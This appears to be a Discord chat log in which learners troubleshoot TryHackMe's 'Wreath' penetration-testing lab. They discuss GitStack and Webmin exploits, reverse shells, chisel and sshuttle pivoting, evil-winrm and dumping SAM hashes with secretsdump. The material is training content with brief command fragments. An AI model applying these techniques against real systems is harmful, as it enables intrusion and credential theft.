one thing I noticed for the Empire section: The first http listener we created was called "Webserver", but on the hop section we're asked to redirect to "Gitserver"

might cause confusion

oh my... someone was a bit literally minded

that looks like a big ncat though

kekw

Swap to -lah!

Human readable sizes or bust

exa or bust

meh

extra letter hard 😄

happy now?

generally, or specifically here?

Also that's a large netcat binary my god

it's apparently the static binary

specifically here, but if you want to share your general state of happiness, feel free

bah chisel is being mean on powershell

so git is pretty magical...

if I do mv C:\\...\\Website.git Website.git then I can do a git clone Website.git directly

avoids all that muck with gittools

and manually re-ordering the commit history...

just for info

woah

Aye, but then you don't learn about Git Tools 😛

Couldn't you jusst clone it from where it currently is?

Why is it only showing only one machine?There should be 3 machines right??

Also I want to ask is it possible to scan this machine by uploading a static copy of nmap on production server?

I have a feeling that second question might be answered by reading further

and the first question, prod-server may not have access to the other host

in upcoming tasks?

okkie

yes

Is wreath broken? Got kicked out of all my shell sessions, nvm the machines stopped ;p

Anyone an idea why I can connect with evil-winrm but cant connect with xfreerdp ?

[09:45:00:273] [6760:6761] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 0: Success
[09:45:00:273] [6760:6761] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:45:00:273] [6760:6761] [ERROR][com.freerdp.core] - freerdp_post_connect failed

Even with sshuttle in place and able to winrm?

I have same problem...

Not really

Sshuttle didn't work on my setup

Weird I'm able to evil winrm fine but no rdp...

Same as @safe meteor

I had one issue where it was trying to proxy my display server

what did you try?

Hi all

im trying to get a reverse shell by modifying the gitserver exploit, i have put a php simple backdoor in the command section

oops

this is the error i get back

On task 19 when trying to run the 43777.py i get the following error.
root@surreal sail:~/wreathnetwork/tools# ./43777.py
Traceback (most recent call last):
File "./43777.py", line 17, in <module>
import requests
ImportError: No module named requests

I have tried to pip uninstall / reinstsll however i get the following error doing that

root@surreal sail:~/wreathnetwork/tools# pip uninstall requests
Found existing installation: requests 2.25.1
Not uninstalling requests at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'requests'. No files were found to uninstall.

I have also done the dos2unix

That's a python exploit, not a PHP exploit

It's not uploading the entire file to the server either -- just the bit at the bottom

And you're essentially doing what it already does, just by GET rather than POST

That's a Python2 thing. Easy solution is to use the Python3 port I made. It's pinned in here.

Failing that, try installing requests for python2 specifically

what part of the bit at the bottom?

I would suggest reading the code, but the last few lines where it's got the hardcoded PHP exploit code

You're already told to modify it

ok

thanks for the help

anyone can help me to SSH Tunnelling / Port Forwarding

channel 0: chan_write_failed for ostate 3
connect_to 10.200.83.200 port 443: failed.
channel 1: chan_write_failed for ostate 3
connect_to 10.200.83.200 port 443: failed.
channel 4: chan_write_failed for ostate 3

i just followed the step and get this error

I am at task 18( git server pivoting) it is adviced to use use sshuttle.If I use other tools would it cause problems?

ok I'm getting an XFreeRDp window if I use /sec:tls but getting this error now...

my user is in the correct groups

That's Remote Management Users

You need Remote Desktop Users for RDP

Or just Administrators

i've definately added the users to the right groups as per guide:

ill try adding it to remote desktop users

@merry robin when are the competition winners being announced and when can we read the reports? 🙂

I accepted the reports yesterday @tranquil river, so you can read them whenever. The winners are, well:

I'm waiting to speak to the last runner up, but the winners are chosen and have all been spoken to

Ooh exciting! I never finished it as I don't have my own PC so couldn't use a local VM 😦

Thank you for letting me know! 🙂

Gave +1 Rep to @merry robin

I'm just trying to give people rep points

you don't seem to have Administrators in your screenshot

yep i got it now 😄 sorry all!

no worries

Btw @merry robin congratulations on wreath, an amazing network, must have taken you so long to build the boxes, then write the content! It's such a fun room.

need to finish that tonight...then write the report :/

i am not abel to scan the give target IP

with nmap

can anyone can help me with that ?

are you sure u're are connected to the Wreath Network?

on the network configuration where we download our vpn connection profiles?

yes

but its not work i check everything

Hi i have a query on task 20. Can someone help

try sudo nmap -sV -sC -O [ip]

I have founded the exploit for gitstack but its written in python2 but when i run the exploit it shows error no module named requests

I have installed it already

Module requests

Changing the default python interpreter from python3 to python2 didn't helped

add a -Pn to remove pinging @crisp fjord

does the hint work? (the image u sent)

nope

my vpn connect as well

problem is somewhere elese

i think someone messedup with this network

even icant open that network ip on my browser !

vote for reset

alread did

or try nmap [IP] -Pn

i try that man

nothing is work

i send ss

see

maybe vote for the reset

.

on which task are you

task 5

Bro I am getting the ports

you are on same

ip network

?

nope 87.200

problem with my network not yours so you are getting

im on 83.200

commands are right wait for the network rest or delete the current connection pack and generate new and then try

ohk

you will get different network

ohk ok

thank you

lol i got same

ip

that's ok but someone here to solve my query

you got the same then you have to wait for your connection pack to get expired or wait for network reset

Have you used regenerate option

@oblique crag admin please help ?

Hey! I'm currently preoccupied. My current recommendation would be to check out the videos attached to each task if this is related to room questions. Regarding other items, please email support@tryhackme.com :)

Anyone having issues with this room?

Can't seem to get a shell now when I have done before

Don't ask to ask, just ask the question and if someone can help, they will 🙂

Give more detail. Which task are you on, etc.

./CVE-2019-15107.py TARGET_IP

[-] Failed to connect to http://10.200.91.xxx:10000/

any other error message?

no

screenshot it maybe? Which task are you on? Is this before the chisel and sshuttle pieces?

I'm trying to get up to that bit

so I'm on q17

but trying to get shell again

side note: might want to get out of the habit of running everything as root :). Not the issue, just mentioning it

so you HAD a shell before, and you lost it?

I know, but I just use it for try hack me so no biggie really

yeah, exactly

was it because of a network timeout? Network reset? Or something else?

nope

So you're on task 6, correct? Webserver exploitation?

Things I'd check: Are you connected to the vpn? Is the network up? (sometimes a page refresh shows more accurate data on that) Can you ping the .200 machine?

If the IP of your network changed or your vpn config changed, make sure that you've updated your /etc/hosts file

any mistakes i made?

well it says destination folder doesn't exist

so, I think probably

my retry after creating the directory

ok well now it looks like you fixed one error you just have to fix the cause of 'not a git repository'

which, would lead me to think you don't have a git repository?

i made a .git

like instructions said

hmmm

i dunno that doesn't look like what I did

i think i should watch dark's video

oh hi @safe meteor

Hello, I get a problem in task 6 reverse exploitation when I run #nc -lvnp 1234, there is nothing

you did it all on evilwinrm?

I copied the git repository with it

ye i did as well

which took a while, then I extracted the website.git (didn't move it)

downloaded the website.git

I just used git clone Website.git instead of mucking about with GitTools, but those tools can be useful in other places

if you downloaded it how does c:\GitStack\repositiories\Website.git work as anything

shouldn't it be in a folder on ur kali

press enter on the exploit

enter

then you will get a shell

it tells you to do so when you type the shell command and enter the host ip and port

ok good it works, thank you

Gave +1 Rep to @tawny fulcrum

🙂

it is

it is a folder on my kali

just renamed it to .git

I see, not actually sure for this

sorry

alright

ill do a bit of digging

thx for help anyway

hmm, can evil-winrm launch a script on spawn?

I want to write a script to set up my proxy, but it looks like I'll need to do it manually 😦

I don't think so, but you could write a powershell script to just activate as soon as you get into the server

There are actually powershell chisel ports, so you could do it entirely from memory too

Hey, so I am working on the Git server, however I cannot connect. It isn't pinging or resolving, I have tried on my machine and on prod, could it be down?

yeah powershell doesn't seem to have access to the upload function though

oh well, close enough

oh...cat and a pipe seems to work

almost

wait no it works. I'm just an idiot

forgot the server part on the chisel

cat setup-proxy.ps1 | proxychains evil-winrm ...

it's a godugly hack but...

If it's a hack but it works, it's not a hack™️

well I think I got the script to proxy back to the personal PC on a fresh network working

and I should be going to bed now

already posted the question

https://tenor.com/view/pedro-monkey-puppet-meme-awkward-gif-15268759

getting the same error...

anyone have any ideas?

I have the same problem

I think u should install the git once again and use git clone command

Hi,
There is a bug for the Task 6 Webserver Exploitation on this question What is the root user's password hash?.
The root user's password hash on the machine is incorrect.
Indeed, I rewrite by hand the one in the @oblique crag 's video (https://www.youtube.com/watch?v=hu4d6nexAog&list=PLsqUCyw0Jf9sMYXly0uuwfKMu34roGNwk&index=3) and they are different.
The one in the video is correct when the one on the machine is not.
Any <@&568449888682246145> could make the change to match the hash on the machine and maybe put the last password on root in order to match the DarkSec video ?
PM open if needed.

@merry robin might be best for this :)

Ok

@night mango Disconnect from the VPN and DM me your config pack please 🙂

(sorry for the ping so... but seems the one who could help me)

Root pass in 82 should now be fixed 🙂

Ah did someone change it?

git clone

?

i never used git clone

was i supposed to?

i think you have the key to my issue

hello?

NOOOOOOOOO!!!!!!!!

lol

well the walkthrough wants you to learn about GitTools

but git clone works as well 🙂

big brain

right then, now to bonk that last server

so how do i use git clone in this situation

git clone Website.git?

im kinda slow i apologise

that should work

on attacking machine

or on evilwinrm

attack

download locally first

using evil-winrm

whoo rev shell script up 😄

really should add the -q to proxychains though, it's very chatty

Then how are you meant to debug?

it works. who cares? 😉

wait I have to grab Visual Studio again? Muiri 😦

Just do it with mono

yeah.../me sighs

oh...darn

still shows as running though

ah there it goes...

Everything went boom

Mono scares me

I am unable to do anything to see if the Git Server is running, trying to ping from Prod and my local machine, vpn connected, unsure how to progress.

I am at that task to🤣

Rename the Website repository to .git

Sadly needed to go to the office 😦

Just 3 more tasks

Yeah them the hard part

Port 80 is already used, the task says to pick a high port

Like say 42069

You should pick ports above 15000

And dont forget to use the right name for applications etc you upload

“socat-bushidosan”

Instead of just socat

Or for the PHP listeners

Hey! I cannot run evil-winrm. I dont know ruby as much. Here's the output when executing the command:

<internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- rexml/document (LoadError)
        from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/response_handler.rb:15:in `<top (required)>'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/transport.rb:16:in `require_relative'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/transport.rb:16:in `<top (required)>'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/transport_factory.rb:15:in `require_relative'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/http/transport_factory.rb:15:in `<top (required)>'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/connection.rb:16:in `require_relative'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm/connection.rb:16:in `<top (required)>'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm.rb:17:in `require_relative'
        from /home/<username>/.local/share/gem/ruby/3.0.0/gems/winrm-2.3.6/lib/winrm.rb:17:in `<top (required)>'
        from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:160:in `require'
        from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:160:in `rescue in require'
        from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:149:in `require'
        from ./evil-winrm.rb:8:in `<main>'
<internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require': cannot load such file -- winrm (LoadError)
        from <internal:/usr/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from ./evil-winrm.rb:8:in `<main>'```

nvm had to install rexml. It's working now

Nice debugging!

I guess apt did it automatically

i did brother

did you fix it? if yes, how?

im so dumb

got it fixed

You gave the directory a name instead of only .git ?

any fixes?

i dont remember how i fixed it

but it was a really dumb mistake

any fixes for this tho?

Which task ?

Probally not wreath ?

43

nah its wreath

ahh yeah I am at 42 xD

had to use secretsdump to get the hashes

ahhh

tell me how it goes

once you get there

Sure will do!

🙂

Dark has btw a complete walkthrough if your stuck

You can watch the first part to get a hint xD

watched it, didnt help much

Not sure why didn't you get them via the mimikatz suggested. Perhaps try running file on both the sam.bak and system.bak files to check which type they actually are

??? what task you on brother

however, if I remember correctly, when I did that somewhere else with those both files, they were just named SYSTEM and SAM

u cant get mimikatz on the last one

ahh, sorry

you gotta use secretsdump

I thought you were on the git machine lol

its fine

lol

but yeah, try perhaps checking the file for validation

or renaming them to SYSTEM and SAM

capital?

yep, without the .bak

will the capital lettes make a difference?

im pretty sure its a python error

not sure

try running it on python2?

when you look the error up it says its a python error

oh boy

sudoing the python 3 does anything?

thats weird, sudoing it makes it not work

and btw i did the same commands as dark

I think the LOCAL parameter might be missing something

https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py LOCAL shows as a parameter of an argument called target, so perhaps try either target=LOCAL or target LOCAL, or remove LOCAL?

all 3 tries

i think the problem is in the LOCAL bit

idk tbh

no, you need to rename the files

take from them the .bak extension

dark didnt change the extensions

but it worked

but its still worth a try

the .bak was used to get the files out of the machine I think

but to dump the file it needs to have no extension

this is very weird

nothing is working

mh, I have no idea

you could try downgrading the Impacket to a standard release and not a dev release

latest according to github seems to be 0.9.22, you have dev 0.9.23

how do i get 0.9.22

can u link it?

https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_22

hi! my network got reset and now I'm having issues with ssh connection to Webserver
It seems to be related to the fact that webserver does not have its public key in autorized_keys
As a result, I cannot use private key form the server for ssh connection. I also cannot edit autorized_keys
Is such situation possible or I'm missing something?

same issue

im stumped

Do have either of the files open in the background? close them and try rerunning the script

which files?

the sam or system

and what do you mean by open?

I think the network is stopped at this moment, could that be it?

Like open in the text editor. I see something in the background of your terminal, but not sure if are those files or something else

ah thats the php webshell 😂

ahh haha

no, it's definitely running
I will add printscreens to explain the issue better (after I figure out how discord works 😂 )

Perhaps they limited the amount of people who have access to the same spawn of the network. For me it shows as stopped. Remember to reload the page of the Wreath room to check the status

You could try it with a program called samdump2 if the impacket didn't work

ok

are you sure we are using the same net? for me webserver is 10.200.89.200

Ahh, perhaps not. For me it is 10.200.111.200, altough last week it was at 10.200.80.200

you could try logging with the SSH keys through a different port, but if the public key got deleted perhaps the network might need to reset

There should be about 8-10 people to a network I'd guess

I FOUND MY MISTAKE

AHAHAHAHAHHAHAHHAHA

ITS SOOOOOOO DUMB

let me guess: the sam and system files where in another folder?

ahahah

NO I SAVED BOTH OF THEM WITH REG AS HKLM/SAM

AHAHAHHAHAHHA

IM SOOOOOO DUMB

ahhh

hahahah

it happens 😛

they also changed some things. When I first joined the network, it had up to 8 votes for reset. Then 4. Now it's at 2

Oops

Oh?

Was 8 on my instance last night afaik

Might be related to number of people on the server

Probably that's related to the number of people currently on that subnet. You get kicked off after 10 days

Ahh, I see. I thought you got kicked out of the room and had to rejoin, but that makes sense. Thanks

https://tryhackme.com/helloworld.exe/badges/wreath

Congrats!

Grats

Well done! A great achievement 🙂

I never finished Wreath because I use AttackBox, but it taught me so much about pivoting, which I think is the most valuable lesson I got from it as I'd never done that before.

huzzah

nice :D

now for the hard part.

finding a way to generate a PDF

dang I didn't timestamp my exploits 😦

timeline will be hard

oh Joplin keeps timestamps, ok so I have approximate times then

Hey @merry robin, sorry for the ping but for like the past 3 days, i haven't been able to at all access the Git Server on Wreath, I have tried in my browser as well as pinging it from the Production Server and my computer.

Do you have a proxy set up to access it?